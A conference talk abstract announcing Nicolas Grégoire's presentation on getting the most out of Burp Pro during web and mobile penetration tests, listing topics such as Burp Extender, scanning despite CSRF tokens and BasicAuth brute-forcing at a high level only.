A lot of services are provided through the Web. Pentesters are spending a lot of time testing Web applications, Web Services, REST and JSON interfaces, mobile applications and thick clients. For all these assessments, an interactive HTTP proxy is mandatory to intercept, analyze, modify and replay the traffic. Burp Pro is the "de facto" tool for this kind of job. This presentation conveys many years of experience in using this tool and will try to address real-life situations. Topics covered: recent features like Burp Extender, testing of mobile applications, automatic scanning despite CSRF tokens (using "Recursive Grep" or Macros) and session logout, interactive parsing and manipulation of items, useful tricks like shortcuts and backups, efficient brute-forcing of BasicAuth forms, ...
Nicolas Grégoire (@agarri_fr), electronic-sheep-herder from the beautiful South of France will show how to get the most out of Burp Pro during pen-tests. A must see for serious offensive security folks who like to do more than just clicking buttons.